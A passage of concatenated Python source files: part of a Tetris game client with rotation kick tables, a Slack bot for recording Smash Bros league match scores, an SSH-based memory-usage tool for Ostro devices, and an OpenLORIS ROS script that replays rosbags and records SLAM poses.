# state 2
[[(0, 0), (0, 2), (0, -1), (-1, 2), (2, -1)], # 2>>3
# [(0, 0), (1, 0), (2, 0), (-1, 0), (-2, 0), (0, -1)], # 2>>0, 180 rotation
[(0, 0)],
[(0, 0), (0, 1), (0, -2), (2, 1), (-1, -2)]], # 2>>1
# state 3
[[(0, 0), (0, 1), (0, -2), (2, 1), (-1, -2)], # 3>>0
# [(0, 0), (0, 1), (0, 2), (0, -1), (0, -2), (1, 0)], # 3>>1, 180 rotation
[(0, 0)],
[(0, 0), (0, -2), (0, 1), (1, -2), (2, 1)]], # 3>>2
]
state = piece.state
num_90rotations %= 4
offset_piece = piece.copy()
ori_x = offset_piece.x
ori_y = offset_piece.y
for _ in range(num_90rotations):
offset_piece.Rotate90()
if num_90rotations == 0:
if self.CheckValidity(offset_piece):
return offset_piece
num_90rotations -= 1
if _IsJLSTZ(piece):
for (offset_x, offset_y) in offset_map_jlstz[state][num_90rotations]:
offset_piece.x = ori_x + offset_x
offset_piece.y = ori_y + offset_y
if (offset_piece.y >= self.width or
offset_piece.x >= self.height + self.map_height_padding):
continue
if self.CheckValidity(offset_piece):
return offset_piece
else:
for (offset_x, offset_y) in offset_map_i[state][num_90rotations]:
offset_piece.x = ori_x + offset_x
offset_piece.y = ori_y + offset_y
if (offset_piece.y >= self.width or
offset_piece.x >= self.height + self.map_height_padding):
continue
if self.CheckValidity(offset_piece):
return offset_piece
return None
def Rotate(self, n: int) -> bool:
"""Rotates the current piece.
:param n: rotations, in range [0,4)
:return: True if the current piece can be rotated. False otherwise.
"""
n %= 4
if n == 0:
return False
fitted_piece = self._FindFittedPiece(num_90rotations=n)
if fitted_piece:
self.current_piece = fitted_piece
self.last_action = actions.Action(dir=0, rotation=n)
if not self.CheckValidity(self.current_piece, (1, 0)):
self._RefreshLockTime()
return fitted_piece is not None
def CheckValidity(self, piece: shape.Shape, offset: Tuple[int, int] = (0, 0)):
"""Checks if the piece with offset can be put in the color_map
:param piece: The piece to be put.
:param offset: The initial (row, col) offset applied to the piece
:return: True if the current state can fit into the color_map. False otherwise.
"""
(ox, oy, os) = (piece.x, piece.y, piece.state)
piece.x += offset[0]
piece.y += offset[1]
# Rows of the bit map covered by the piece's 4x4 bounding box.
a = self.bit_map[piece.x: piece.x + 4]
# Bit offset of the piece's column position within the padded row.
b = self.width - piece.y
# 4-row occupancy bit mask of the piece, shifted to its column position.
c = piece.GetBitMap().astype(self.dtype)
d = c << b
# Any overlapping set bit means a collision with filled cells or the padding walls.
e = a & d
check_rst = e == 0
(piece.x, piece.y, piece.state) = (ox, oy, os)
return np.all(check_rst)
def _GetNextBag(self):
start_y = int((self.width - 3) / 2)
assert start_y >= 0
bag = [shape.I(start_y=start_y),
shape.J(start_y=start_y),
shape.L(start_y=start_y),
shape.O(start_y=start_y),
shape.S(start_y=start_y),
shape.T(start_y=start_y),
shape.Z(start_y=start_y)]
np.random.shuffle(bag)
return bag
def _RefillPieces(self):
"""
When there are REFILL_THRESHOLD or fewer pieces in the list,
refill it with a new bag.
"""
if len(self.piece_list) <= REFILL_THRESHOLD:
self.piece_list.extend(self._GetNextBag())
def _TakePieceFromList(self):
self._RefillPieces()
self.current_piece = self.piece_list[0].copy()
self.piece_list = self.piece_list[1:]
def CreateGameFromState(state: GameState) -> GameClient:
game = GameClient(height=state.height, width=state.width)
game.color_map = np.copy(state.color_map)
game.current_piece = state.current_piece.copy()
if state.held_piece is not None:
game.held_piece = state.held_piece.copy()
else:
game.held_piece = None
game.score = state.score
game.piece_list = state.piece_list.copy()
game.can_swap = state.can_swap
game.is_gameover = state.is_gameover
game.accumulated_lines_eliminated = state.accumulated_lines_eliminated
game.piece_dropped = state.piece_dropped
game.line_sent = state.line_sent
game.line_received = state.line_received
return game
|
smashbot.py
|
import os, sys
sys.path.append(os.path.dirname(__file__))
from slackclient import SlackClient
import bot_config
import db
import collections
from match_making import gather_scores, get_player_name
import time
from websocket import WebSocketConnectionClosedException
from multiprocessing import Process
from datetime import datetime
import logging, sys
class SmashBot():
def __init__(self):
self.slack_client = SlackClient(bot_config.get_slack_api_key())
self.logger = logging.getLogger('smashbot')
hdlr = logging.FileHandler(bot_config.get_log_path())
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
self.logger.addHandler(hdlr)
self.logger.setLevel(logging.DEBUG)
self.logger.debug('booting up smashbot file')
def keepalive(self):
while True:
time.sleep(3)
try:
self.slack_client.server.ping()
except WebSocketConnectionClosedException as e:
self.logger.debug('Keep alive web socket exception.')
self.slack_client.rtm_connect()
def print_help(self, channel):
message = 'I support the following:'
message = message + '\n`@sul me over @them 3-2` or `@sul @them over me 3-2` - report a score'
message = message + '\n`@sul group a` - see the current rankings of a group'
# message = message + '\n`@sul leaderboard` - see the leaderboard, sorted by winrate'
# message = message + '\n`@sul loserboard` - see the loserboard, sorted by winrate'
message = message + '\n`@sul who do i play` - see who you play this week (only in dms)'
message = message + '\n`@sul matches for week` - see all matches occurring this week in all groups'
# message = message + '\n`@sul my total stats` - see your total wins and losses (both games and sets)'
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
### TODO Refactor so it can support Bo3 AND Bo5 across the database
def get_leaderboard(self, reverse_order=True):
matches = db.get_matches()
players = db.get_players()
player_dict = dict()
for player in players:
player_dict[player.slack_id] = {
'games_won': 0,
'games_total': 0,
'name': player.name
}
for match in matches:
games_played = match.sets
player_1 = player_dict[match.player_1_id]
player_2 = player_dict[match.player_2_id]
player_dict[match.player_1_id]['games_total'] = player_1['games_total'] + games_played
player_dict[match.player_2_id]['games_total'] = player_2['games_total'] + games_played
if match.player_1_id == match.winner_id:
player_dict[match.player_1_id]['games_won'] = player_1['games_won'] + 2
if games_played == 3:
player_dict[match.player_2_id]['games_won'] = player_2['games_won'] + 1
elif match.player_2_id == match.winner_id:
player_dict[match.player_2_id]['games_won'] = player_2['games_won'] + 2
if games_played == 3:
player_dict[match.player_1_id]['games_won'] = player_1['games_won'] + 1
winrate_dict = dict()
for player_id, player in player_dict.items():
if player['games_total'] == 0:
winrate_dict[player['name']] = {
'games_won': 0,
'games_lost': 0,
'winrate': round(0, 2)
}
else:
winrate_dict[player['name']] = {
'games_won': player['games_won'],
'games_lost': player['games_total'] - player['games_won'],
'winrate': round((player['games_won'] / player['games_total']) * 100, 2)
}
sorted_winrates = collections.OrderedDict(sorted(winrate_dict.items(), key=lambda x: x[1]['winrate'], reverse=reverse_order))
return sorted_winrates
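# Worked example of the tally above (illustrative): for a match recorded with
# sets == 3 where player_1 is the winner, player_1 gets +2 games_won and
# player_2 gets +1, while both players' games_total grows by 3; winrate is then
# games_won / games_total, rounded to two decimals.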
### TODO Refactor so it can support Bo3 AND Bo5 across the database
def print_leaderboard(self, channel):
sorted_winrates = self.get_leaderboard()
message = ""
for player_name in list(sorted_winrates)[:10]:
player_object = sorted_winrates[player_name]
message = message + f"\n {player_name}: {player_object['winrate']}% ({player_object['games_won']}-{player_object['games_lost']})"
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
### TODO Refactor so it can support Bo3 AND Bo5 across the database
def print_loserboard(self, channel):
sorted_winrates = self.get_leaderboard(False)
message = ""
for player_name in list(sorted_winrates)[:10]:
player_object = sorted_winrates[player_name]
message = message + f"\n {player_name}: {player_object['winrate']}% ({player_object['games_won']}-{player_object['games_lost']})"
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
def print_whole_week(self, channel, date):
all_weekly_matches = db.get_matches_for_week(date)
players = db.get_players()
message = ""
for match in all_weekly_matches:
message = message + f"\n {get_player_name(players, match.player_1_id)} vs. {get_player_name(players, match.player_2_id)} : week: {match.week}"
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
def print_user_week(self, user_id, channel, date):
all_weekly_matches = db.get_matches_for_week(date)
players = db.get_players()
user_match_dict = dict()
for match in all_weekly_matches:
if match.player_1_id == user_id:
user_match_dict[get_player_name(players, match.player_2_id)] = match.week
elif match.player_2_id == user_id:
user_match_dict[get_player_name(players, match.player_1_id)] = match.week
message = ""
for player, week in user_match_dict.items():
message = message + f"\n Playing: {player} | week: {week}"
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
### TODO Refactor so it can support Bo3 AND Bo5 across the database
def print_user_stats(self, user_id, channel):
all_matches = db.get_matches()
total_won_matches = 0
total_lost_matches = 0
total_won_sets = 0
total_lost_sets = 0
for match in all_matches:
if match.winner_id is None:
continue
elif user_id == match.winner_id:
total_won_matches += 1
total_won_sets += 2
if match.sets == 3:
total_lost_sets += 1
elif (match.player_1_id == user_id or match.player_2_id == user_id) and user_id != match.winner_id:
total_lost_matches += 1
total_lost_sets += 2
if match.sets == 3:
total_won_sets += 1
message = f"\n Matches Won: {total_won_matches} | Matches Lost: {total_lost_matches} | Sets Won: {total_won_sets} | Sets Lost: {total_lost_sets}"
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
def print_group(self, channel, group):
try:
season = db.get_current_season()
all_matches = db.get_matches_for_season(season)
all_players = db.get_players()
group_matches = [m for m in all_matches if m.grouping.lower() == group.lower()]
if not len(group_matches):
raise Exception('Not a match')
players = gather_scores(group_matches)
message = 'Group ' + group.upper() + ':'
for p in players:
message += '\n' + get_player_name(all_players, p['player_id']) + ' ' + str(p['m_w']) + '-' + str(p['m_l'])
message += ' ('+str(p['s_w'])+'-'+str(p['s_l'])+')'
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
except Exception as e:
self.logger.debug(e)
self.slack_client.api_call("chat.postMessage", channel=channel, text="Not a group (or I messed up).", as_user=True)
def parse_first_slack_id(self, message):
return message[message.index('<@') + 2 : message.index('>')].upper()
def parse_second_slack_id(self, message):
message = message[message.index('>') + 1:]
return self.parse_first_slack_id(message)
def parse_score(self, message):
dash_index = message.index('-')
score_substring = message[dash_index - 1 : dash_index + 2]
if score_substring != "3-0" and score_substring != "3-1" and score_substring != "3-2":
raise Exception("Malformed score")
score_1 = int(score_substring[0])
score_2 = int(score_substring[2])
return score_1, score_2
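# Illustrative parsing examples (hypothetical Slack IDs, derived from the
# helpers above):
#   parse_first_slack_id('<@u123abc> over me 3-2')  -> 'U123ABC'
#   parse_second_slack_id('<@U1> over <@U2> 3-0')   -> 'U2'
#   parse_score('me over <@U1> 3-1')                -> (3, 1)
# Any score other than 3-0, 3-1 or 3-2 raises "Malformed score".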
def parse_message(self, command, poster):
isAdmin = poster == bot_config.get_commissioner_slack_id()
if command.startswith('me over '):
winner = poster
loser = self.parse_first_slack_id(command)
elif command.startswith('<@') and command.index('over me') > 0:
winner = self.parse_first_slack_id(command)
loser = poster
elif isAdmin and command.startswith('<@'):
winner = self.parse_first_slack_id(command)
loser = self.parse_second_slack_id(command)
else:
self.logger.debug('Bad message format')
return None
if winner == loser:
self.logger.debug("Can't play against yourself")
return None
try:
score_1, score_2 = self.parse_score(command)
except Exception as e:
self.logger.debug('Malformed score', e)
return None
return {
'winner_id': winner,
'loser_id': loser,
'score_total': (score_1 + score_2)
}
def enter_score(self, winner_id, loser_id, score_total, channel, timestamp):
try:
if not db.update_match_by_id(winner_id, loser_id, score_total):
self.slack_client.api_call("chat.postMessage", channel=channel, text='Not a match I have (or I messed up).', as_user=True)
self.slack_client.api_call("reactions.add", name="x", channel=channel, timestamp=timestamp)
return
self.slack_client.api_call("chat.postMessage", channel=bot_config.get_commissioner_slack_id(), text='Entered into db', as_user=True)
self.slack_client.api_call("reactions.add", name="white_check_mark", channel=channel, timestamp=timestamp)
except Exception as e:
self.slack_client.api_call("chat.postMessage", channel=bot_config.get_commissioner_slack_id(), text='Failed to enter into db', as_user=True)
self.slack_client.api_call("reactions.add", name="x", channel=channel, timestamp=timestamp)
self.logger.error(e)
def filter_invalid_messages(self, message_list):
valid_messages = []
for message_object in message_list:
if message_object is None:
continue
if 'text' not in message_object or 'channel' not in message_object or 'user' not in message_object or 'ts' not in message_object:
continue
if 'bot_id' in message_object:
continue
message_text = message_object['text']
if message_object['channel'][:1] == 'D':
if message_text.startswith('<@' + bot_config.get_bot_slack_user_id() + '>'):
message_text = message_text[message_text.index(">") + 1:].strip()
message_object['text'] = message_text
valid_messages.append(message_object)
continue
if message_object['channel'] == bot_config.get_channel_slack_id() and message_text.startswith('<@' + bot_config.get_bot_slack_user_id() + '>'):
message_text = message_text[message_text.index(">") + 1:].strip()
message_object['text'] = message_text
valid_messages.append(message_object)
continue
return valid_messages
def handle_message(self, message_object):
command = message_object["text"]
channel = message_object["channel"]
user_id = message_object["user"]
timestamp = float(message_object["ts"])
user_date = datetime.fromtimestamp(timestamp).date()
""""
if command == 'leaderboard':
self.print_leaderboard(channel)
elif command == 'loserboard' or command == 'troy':
self.print_loserboard(channel)
elif command == 'my total stats' and channel[:1] == 'D':
self.print_user_stats(user_id, channel)
"""
if command == 'matches for week':
self.print_whole_week(channel, user_date)
elif command == 'who do i play' and channel[:1] == 'D':
self.print_user_week(user_id, channel, user_date)
elif command == 'help':
self.print_help(channel)
elif command.startswith('group'):
self.print_group(channel, command[6])
else:
result = None
try:
result = self.parse_message(command, user_id)
except Exception as e:
self.logger.debug(e)
if result is None:
format_msg = "Didn't catch that. The format is `@sul me over @them 3-2` or `@sul @them over me 3-2`."
self.slack_client.api_call("chat.postMessage", channel=channel, text=format_msg, as_user=True)
elif result is not None and channel[:1] == 'D':
format_msg = "Nice try, you have to put this in the main channel"
self.slack_client.api_call('chat.postMessage', channel=channel, text=format_msg, as_user=True)
elif result is not None and channel == bot_config.get_channel_slack_id():
self.enter_score(result['winner_id'], result['loser_id'], result['score_total'], channel, message_object["ts"])
player = db.get_player_by_id(result['winner_id'])
self.print_group(channel, player.grouping)
return None
def start_bot(self):
p = Process(target=self.keepalive)
p.start()
if self.slack_client.rtm_connect():
print("StarterBot connected and running!")
while True:
try:
message_list = self.slack_client.rtm_read()
message_list = self.filter_invalid_messages(message_list)
for message in message_list:
try:
self.handle_message(message)
except Exception as e:
self.logger.debug(e)
self.slack_client.api_call("reactions.add", name="x", channel=message["channel"], timestamp=message["ts"])
time.sleep(1)
except Exception as e:
self.logger.debug('Main while loop web socket exception.', e)
self.slack_client.rtm_connect()
else:
print("Connection failed. Invalid Slack token or bot ID?")
if __name__ == "__main__":
SmashBot().start_bot()
|
memuse.py
|
#!/usr/bin/python
import sys
sys.path.insert(0, './src')
import argparse
import os
import threading, time
from target_machine import *
from target_xml import *
from thread_input import *
thread_args = []
def menu():
parser = argparse.ArgumentParser(description='memuse for Ostro')
parser.add_argument('--ip', '-i', nargs=1)
parser.add_argument('--port', '-p', nargs=1, type=int)
parser.add_argument('--user', '-u', nargs=1, default='root')
parser.add_argument('--password', '-w', nargs=1, default='iotos')
parser.add_argument('--load', '-l', nargs=1)
parser.add_argument('--output', '-o', nargs=1, default='./outputs')
parser.add_argument('--process', '-s', nargs=1)
args = parser.parse_args()
return args
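# Example invocations (illustrative values):
#   ./memuse.py --ip 192.168.1.10 --port 22 --user root --password iotos --process crond
#   ./memuse.py --load targets.xml --output ./outputs
# With --load, targets are read from an XML config parsed by parse_target_xml();
# otherwise a single target is built from --ip/--port/--user/--password.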
def analyze_process(ti):
tm = TargetMachine(ti.ip, ti.port, ti.user, ti.password)
print ti.ip
dst = '/tmp/' + ti.ip
src = '/tmp/proc/'
pname = ti.process
tm.analyze_memstat(src, dst, ti.output, pname)
def test_target(ti):
tm = TargetMachine(ti.ip, ti.port, ti.user, ti.password)
print ti.ip
dst = '/tmp/' + ti.ip
src = '/tmp/proc/'
tm.analyze_memstat(src, dst, ti.output, ti.process)
if __name__ == '__main__':
#err = 0
args = menu()
#print args.ip[0], args.port[0], args.user, args.password, args.load, args.output
threads = []
ti = ThreadInput()
#Functional options.
if args.process != None:
ti.process = args.process[0]
else:
ti.process = ''
if args.load == None:
#ti = ThreadInput(args.ip[0], args.port[0], args.user, args.password, args.output)
#thread_args.append(ti)
#index = thread_args.
ti.set_machine(args.ip[0], args.port[0], args.user, args.password, args.output)
arglist = []
arglist.append(ti)
thread = threading.Thread(target=test_target, args=arglist)
threads.append(thread)
else:
config = args.load[0]
print config
if os.path.exists(config) == False:
print 'Invalid target config file.'
#err = -1
else:
inputs = parse_target_xml(config)
for i in inputs:
i.outputs = args.output
print i._myself()
arglist = []
arglist.append(i)
thread = threading.Thread(target=test_target, args=arglist)
threads.append(thread)
for t in threads:
t.start()
for t in threads:
threading.Thread.join(t)
print 'All of the jobs have completed.'
|
openloris_test_ros.py
|
#!/usr/bin/env python
# Copyright (C) <2019-2021> Intel Corporation
# SPDX-License-Identifier: MIT
# Authors: Siyuan Lu; Xuesong Shi
from __future__ import print_function
import argparse
from collections import OrderedDict
import glob
import logging
import psutil
#import rosbag
import rospy
import sys
import time
import threading
import subprocess
import yaml
import signal
import os
from geometry_msgs.msg import PoseStamped
from std_msgs.msg import UInt8
from std_msgs.msg import String
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
#formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
formatter = logging.Formatter('%(message)s')
ch = logging.StreamHandler()
ch.setFormatter(formatter)
logger.addHandler(ch)
init_pose_topic = '/openloris/reset_pose'
valid_frames = ['d400_color', 'd400_depth', 'd400_imu', 't265_fisheye1', 't265_fisheye2', 't265_imu', 'base_link']
global pose_count
global current_pose
def pose_callback(data):
#logger.info(data)
print("%d.%d %s %f %f %f %f %f %f %f"
% (data.header.stamp.secs, data.header.stamp.nsecs,
rospy.get_time(),
data.pose.position.x,
data.pose.position.y,
data.pose.position.z,
data.pose.orientation.x,
data.pose.orientation.y,
data.pose.orientation.z,
data.pose.orientation.w)
)
global pose_count, current_pose
pose_count += 1
current_pose = (data.pose.position.x,
data.pose.position.y,
data.pose.position.z,
data.pose.orientation.x,
data.pose.orientation.y,
data.pose.orientation.z,
data.pose.orientation.w)
def handle_listener(topic):
rospy.Subscriber(topic, PoseStamped, pose_callback)
rospy.spin()
def sigint_handler(sig, frame):
print('# interrupted by user')
sys.exit('\nExit testing...\n')
def play_sequences(bags, topics, aided_reloc, scene, frame, pub_pose):
seq = 1
DEVNULL = open(os.devnull, 'r+b', 0)
global pose_count, current_pose
for bag in bags:
if seq != 1:
if aided_reloc:
init_pose = PoseStamped()
#p = get_init_pose(scene, seq, frame)
p = openloris_init_poses[frame][scene][seq]
init_pose.header.seq = seq
init_pose.header.frame_id = frame
init_pose.pose.position.x = p[0]
init_pose.pose.position.y = p[1]
init_pose.pose.position.z = p[2]
init_pose.pose.orientation.x = p[3]
init_pose.pose.orientation.y = p[4]
init_pose.pose.orientation.z = p[5]
init_pose.pose.orientation.w = p[6]
pub_pose.publish(init_pose)
logger.info('Published initial pose for the next sequence on %s' % (init_pose_topic))
time.sleep(1)
print("seq: %d" % seq)
print("aided_reloc: false")
logger.info('Playing %s ...' % (bag))
pose_count = 0
current_pose = None
process = subprocess.Popen(['rosbag', 'play', bag, '--topics'] + topics, stdin=DEVNULL, stdout=DEVNULL)
previous_pose = None
previous_count = 0
while process.poll() == None:
if current_pose is not None and current_pose != previous_pose:
logger.info('Received poses in %d FPS. Current: (%s)' % (pose_count - previous_count, ', '.join('%.4f' % v for v in current_pose)))
previous_pose = current_pose
previous_count = pose_count
time.sleep(1)
time.sleep(1)
logger.info('Got %d poses for %s' % (pose_count, bag.split('/')[-1]))
seq += 1
def publish_msg(msg, pose):
pub_n = rospy.Publisher('new_sequence', UInt8, queue_size=10)
pub_p = rospy.Publisher('/openloris/reset_pose', PoseStamped, queue_size=10)
rate = rospy.Rate(10)
time = rospy.get_rostime().to_sec() + 1
while True:
new_time = rospy.get_rostime().to_sec()
if new_time > time:
return
pub_n.publish(msg)
rate.sleep()
pub_p.publish(pose)
def cpu_info():
CPUinfo=OrderedDict()
procinfo=OrderedDict()
nprocs = 0
with open('/proc/cpuinfo') as f:
for line in f:
if not line.strip():
#end of one processor
CPUinfo['proc%s' % nprocs]=procinfo
nprocs = nprocs+1
#Reset
procinfo=OrderedDict()
else:
if len(line.split(':')) == 2:
procinfo[line.split(':')[0].strip()] = line.split(':')[1].strip()
else:
procinfo[line.split(':')[0].strip()] = ''
return CPUinfo
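# Illustrative return structure (field values depend on the host):
#   {'proc0': {'processor': '0', 'model name': 'Intel(R) ...', ...},
#    'proc1': {...}, ...}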
def complete_topics(topics):
out = []
for topic in topics:
topic = topic.strip()
if not topic.startswith('/'):
topic = '/' + topic
topic = topic.rstrip('/')
if topic.endswith('color') or topic.endswith('depth') or topic.endswith('fisheye1') or topic.endswith('fisheye2'):
out.append(topic + '/image_raw')
out.append(topic + '/camera_info')
elif topic.endswith('accel') or topic.endswith('gyro'):
out.append(topic + '/sample')
out.append(topic + '/imu_info')
else:
out.append(topic)
return out
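# Example expansion performed by complete_topics() (illustrative topic names):
#   ['d400/color', 'd400/accel', '/tf'] ->
#   ['/d400/color/image_raw', '/d400/color/camera_info',
#    '/d400/accel/sample', '/d400/accel/imu_info', '/tf']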
def generate_info(algorithm, topics, target_frame, use_gpu):
info = ''
info += 'algorithm: %s\n' % algorithm
info += 'topics: %s\n' % ','.join(topics)
info += 'frame: %s\n' % target_frame
for processor in cpu_info().keys():
cpu_model = cpu_info()[processor]['model name']
info += 'CPU: %s\n' % (cpu_model)
if use_gpu:
try:
import pynvml
has_pynvml = True
except ModuleNotFoundError:
print("Install pynvml to get GPU info")
has_pynvml = False
if has_pynvml:
info += 'GPU:'
pynvml.nvmlInit()
deviceCount = pynvml.nvmlDeviceGetCount()
for i in range(deviceCount):
handle = pynvml.nvmlDeviceGetHandleByIndex(i)
gpu = pynvml.nvmlDeviceGetName(handle)
info += ' ' + gpu.decode('utf-8')
info += '\n'
else:
info += 'GPU: unable to detect; please install pynvml\n'
mem_g = psutil.virtual_memory().total/1024/1024/1024
info += "memory: %d GB\n" % mem_g
return info
def get_bag_list(path, scene, sequences):
bags = []
for seq in range(1, sequences + 1):
results = glob.glob(r'%s/%s-1-%d*.bag' % (path, scene, seq))
if len(results) < 1: sys.exit('Cannot find %s-1-%d*.bag in %s' % (scene, seq, path))
bags.append(results[0])
return bags
def main():
'''
Main function of this script.
'''
#logger.info('Please check the above testing configurations. Correct? [Y/n]')
#raw_input()
# Parse config
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--config', type=str, default='test.yaml', help='config file')
args = parser.parse_args()
config_file = args.config
logger.info('config: %s', config_file)
config = None
with open(config_file) as cfile:
config = yaml.safe_load(cfile)
if config is None:
sys.exit('Could not open the configuration file %s' % config_file)
#print(config)
topics = complete_topics(config['input_topics'])
rate = config['rate'] if 'rate' in config else 1
tests = []
for test in config['tests']:
if test['enable']:
test['bags'] = get_bag_list(test['path'], test['scene'], test['sequences'])
tests.append(test)
pub_pose = rospy.Publisher(init_pose_topic, PoseStamped, queue_size=10)
# Confirm config
if config['frame'] not in valid_frames:
logger.error('Invalid frame %s' % config['frame'])
logger.error('Valid frames are: %s', ', '.join(valid_frames))
sys.exit()
info = generate_info(config['algorithm'], config['input_topics'], config['frame'], config['use_gpu'])
logger.info('---------------------------------------------')
logger.info(info)
#for item in ['algorithm', 'pose_topic', 'frame', 'aided_reloc', 'use_gpu', 'input_topics']:
# logger.info('%s: %s' % (item, str(configs[item])))
for test in tests:
logger.info('--\nscene: %s' % test['scene'])
logger.info(' ' + '\n '.join(test['bags']))
logger.info('---------------------------------------------')
key = raw_input('Please check the above testing configurations. Correct? [Y/n]')
if key not in ['', 'y', 'Y']:
logger.info('Please correct the configurations in %s' % config_file)
sys.exit()
# Prepare for testing
rospy.init_node('openloris_test', anonymous=True)
t_listener = threading.Thread(target=handle_listener, args=(config['pose_topic'],))
t_listener.setDaemon(True)
t_listener.start()
outfolder = 'openloris_results_%s' % config['algorithm']
if not os.path.exists(outfolder):
os.mkdir(outfolder)
signal.signal(signal.SIGINT, sigint_handler)
# Test
for test in tests:
scene = test['scene']
logger.info('---------------------------------------------')
logger.info('Test: %s (%d sequences)' % (scene, test['sequences']))
logger.info('Please %s your algorithm, make sure it has subscribed to the right topics, and will publish poses (PoseStamped) on %s' \
% ('get ready' if tests.index(test) == 0 else 'restart/reset', config['pose_topic']))
logger.info('Once ready, you are not allowed to provide any manual input to your algorithm. <Press Enter to start>')
raw_input()
outfilename = outfolder + ('/%s-1.txt' % scene)
sys.stdout = open(outfilename, mode='w')
print('scene: %s' % scene)
print(info)
# try:
play_sequences(test['bags'], topics, config['aided_reloc'], scene, config['frame'], pub_pose)
sys.stdout.close()
logger.info('Results have been saved to %s' % outfilename)
# except Exception as e:
# logger.error(e)
# sys.exit(-1)
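# Illustrative test.yaml layout (keys taken from how main() reads the config;
# the values shown here are placeholders):
#   algorithm: my_slam
#   pose_topic: /my_slam/pose
#   frame: d400_color
#   aided_reloc: false
#   use_gpu: false
#   input_topics: [d400/color, d400/depth]
#   rate: 1
#   tests:
#     - enable: true
#       path: /data/openloris
#       scene: office
#       sequences: 7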
openloris_init_poses = {
"d400_color": {
"home": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (2.048979,-0.002665,4.537484,-0.009075,-0.562620,0.003767,0.826657),
3: (-0.768389,0.061032,7.263491,-0.010878,-0.674418,0.004516,0.738255),
4: (-2.449708,0.068256,4.292432,0.007224,0.447841,-0.002999,0.894079),
5: (0.920740,-0.006231,1.287274,0.012846,0.796441,-0.005333,0.604556),
},
"market": {
1: (-0.000000,0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (1.305539,-2.203308,15.508237,-0.000171,0.059580,0.008479,0.998187),
3: (1.082180,-2.558096,17.996719,0.000065,-0.022770,-0.003241,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (-0.580684,0.010388,0.152612,-0.002699,-0.167305,0.001120,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (-36.176285,0.646324,9.377665,-0.001365,-0.084694,0.000567,0.996406),
3: (-36.552540,0.654303,9.662947,-0.001386,-0.085934,0.000575,0.996300),
4: (-46.958865,0.900254,21.325972,0.012293,0.762042,-0.005103,0.647391),
5: (-36.054248,0.629627,7.177968,-0.001892,-0.117289,0.000785,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (-3.442015,0.003196,0.338312,-0.005375,0.120520,0.000077,0.992696),
3: (-3.694180,-0.012357,-0.251014,-0.001239,0.999841,-0.017416,0.003740),
4: (-3.552656,-0.004217,-0.019779,-0.001152,0.989872,-0.015916,0.141061),
5: (-3.530060,0.012260,0.878919,0.003576,0.033667,0.000285,0.999427),
6: (0.011558,-0.000277,-0.099034,-0.004520,0.024910,-0.000547,0.999679),
7: (-3.505344,0.010941,0.707510,-0.008124,0.198803,0.000582,0.980006),
},
},
"d400_depth": {
"home": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (2.012263,0.021269,4.562794,-0.006943,-0.562634,0.005684,0.826657),
3: (-0.825435,0.083665,7.272808,-0.008322,-0.674436,0.006814,0.738255),
4: (-2.480525,0.073705,4.265565,0.005526,0.447852,-0.004525,0.894079),
5: (0.894962,0.001863,1.277470,0.009828,0.796461,-0.008047,0.604556),
},
"market": {
1: (-0.000000,0.000000,-0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (1.179254,-2.180837,15.519733,-0.000560,0.059587,0.008416,0.998187),
3: (0.935694,-2.534688,18.008920,0.000214,-0.022773,-0.003216,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-0.582661,0.008746,0.154042,-0.002065,-0.167310,0.001690,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-36.233228,0.539726,9.165883,-0.001044,-0.084696,0.000856,0.996406),
3: (-36.611187,0.547249,9.448964,-0.001060,-0.085936,0.000868,0.996300),
4: (-47.102917,0.793742,21.031925,0.009405,0.762061,-0.007699,0.647391),
5: (-36.098462,0.515858,6.967956,-0.001447,-0.117292,0.001185,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-3.444198,-0.008900,0.314562,-0.005836,0.120498,-0.000376,0.992696),
3: (-3.722319,-0.027628,-0.274054,-0.004965,0.999762,-0.020924,0.003740),
4: (-3.581410,-0.018210,-0.046041,-0.004849,0.989799,-0.019389,0.141061),
5: (-3.535166,0.001734,0.857186,0.003445,0.033682,0.000188,0.999427),
6: (0.012155,-0.000593,-0.099704,-0.004612,0.024890,-0.000660,0.999679),
7: (-3.510364,-0.000136,0.681082,-0.008888,0.198771,-0.000162,0.980006),
},
},
"d400_imu": {
"home": {
1: (0.000000,-0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (2.019698,0.021305,4.575453,-0.006943,-0.562634,0.005684,0.826657),
3: (-0.818771,0.083748,7.289096,-0.008322,-0.674436,0.006814,0.738255),
4: (-2.492207,0.073852,4.265824,0.005526,0.447852,-0.004525,0.894079),
5: (0.876524,0.002188,1.287055,0.009828,0.796461,-0.008047,0.604556),
},
"market": {
1: (0.000000,-0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (1.178006,-2.212088,15.514719,-0.000561,0.059570,0.008536,0.998187),
3: (0.936309,-2.571069,18.004021,0.000214,-0.022766,-0.003262,0.999735),
},
"cafe": {
1: (0.000000,-0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-0.579084,0.008727,0.156544,-0.002065,-0.167310,0.001690,0.985901),
},
"corridor": {
